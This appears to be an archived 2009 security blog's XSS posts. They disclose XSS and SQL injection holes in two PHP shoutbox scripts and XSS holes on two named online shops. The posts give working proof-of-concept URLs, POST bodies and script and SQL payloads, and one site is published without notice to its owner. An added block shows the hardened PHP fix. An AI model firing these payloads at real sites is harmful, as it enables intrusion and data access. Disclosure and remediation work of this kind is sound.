Archive for the ‘XSS’ Category

Advanced Shoutbox and MySql Shoutbox scripts

July 11, 2009

Today I have found an XSS hole in the “Advanced Shoutbox” script and the same XSS hole and an SQL injection vulnerability in the “MySql shoutbox”, which are available here: http://plohni.com/wb/content/php/Free_scripts.php

Advanced Shoutbox

index.php Line 37:
<form action="<?php echo $_SERVER["PHP_SELF"]; ?>" method="post">

index.php Line 79-82:
if($display == "all"){
?><a href="<?php echo $_SERVER["PHP_SELF"]; ?>">View small shoutbox</a><?php
}else{
?><a href="<?php echo $_SERVER["PHP_SELF"]; ?>?show=all">View all shouts</a><?php
}

Very easy to exploit:
http://host/PATH_TO_SHOUTBOX/index.php/%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3Cspan

Affected Version: 1.0

MySql shoutbox

The XSS hole is the same as above, but on lines 50, 55 and 97-99.

SQL Injection:
index.php does not sanitize the user's input on lines 105 and 106.

$input_name = $_POST["input_name"];
$input_text = $_POST["input_text"];
...
if($row["name"] != $input_name && $row["comment"] != $input_text){
    mysql_query("INSERT INTO $db_table (name,comment) VALUES ('$input_name','$input_text');") or die(mysql_error()); //insert name and shout
}

Just send a POST request to the index.php. In the name field enter whatever you want and in the text field enter '+@@version+' (including the ').

Affected Version: 1.0

Vendor has been informed on 27.06.2009

This post was automatically published two weeks after the vendor was informed.
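
The hardened form of the two patterns shown in this post, as an added example that is not part of the original post or of the shoutbox scripts. The helper names `safe_self` and `add_shout`, the `shouts` table and the in-memory SQLite database (standing in for MySQL so the block runs offline) are assumptions made for illustration.

```php
<?php
// Added example: helper names and table name are hypothetical.

// PHP_SELF includes any client-supplied path info after the script name
// (index.php/...), so it must never be echoed raw. SCRIPT_NAME omits the
// path info; escaping it as well keeps the attribute context safe.
function safe_self(array $server): string
{
    return htmlspecialchars($server['SCRIPT_NAME'] ?? '', ENT_QUOTES, 'UTF-8');
}

// Parameterized INSERT: name and comment travel as bound values, so quotes
// in the input cannot change the structure of the SQL statement.
function add_shout(PDO $db, string $name, string $text): void
{
    $stmt = $db->prepare('INSERT INTO shouts (name, comment) VALUES (:name, :comment)');
    $stmt->execute([':name' => $name, ':comment' => $text]);
}

// Constructed demo database: in-memory SQLite stands in for the MySQL table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE shouts (name TEXT, comment TEXT)');

// Constructed request values modelled on the inputs quoted in the post.
$server = [
    'SCRIPT_NAME' => '/shoutbox/index.php',
    'PHP_SELF'    => '/shoutbox/index.php/"><script>alert(\'xss\')</script><span',
];
add_shout($db, 'guest', "'+@@version+'");

// The form action no longer reflects the path info.
echo '<form action="' . safe_self($server) . '" method="post">', "\n";

// The comment is stored literally and escaped again when it is displayed.
foreach ($db->query('SELECT name, comment FROM shouts') as $row) {
    echo htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8'), ': ',
         htmlspecialchars($row['comment'], ENT_QUOTES, 'UTF-8'), "\n";
}
```

The same two changes apply to every `$_SERVER["PHP_SELF"]` echo and to the `mysql_query` INSERT quoted above.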

XSSed: move-ya.com

June 21, 2009

I had a little break, and found a new shop with XSS holes in it: move-ya.com

http://www.move-ya.com/shop/html/detailsearch/DetailSearch_Re105.php?W0=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E&W1=&W2=&W3=

I’ve sent an email to them…

XSSed: softerpore.com

June 21, 2009

New blog, new XSS…
Today I found an internet shop which is doing a lot of comment spamming in blogs etc… -> http://www.softerpore.com
It did not take long to find an XSS hole in the registration page:
Just post
fname=%22%3E%3CSCrIPT%3Ealert%28%22Yes%2C+I%27m+vulnerable+to+XSS%22%29%3C%2FSCrIPT%3E&lname=&mail=&send=Create+Account
to http://www.softerpore.com/registration/

Or enter
"><SCrIPT>alert("Yes, I'm vulnerable to XSS")</SCrIPT>
into whichever input box you want.

And no… I will not give damn spammers a link to their website, you have to copy & paste… And in this case I will not send a notice to the administrator. He has enough to do with spamming etc., I don’t want to disturb him…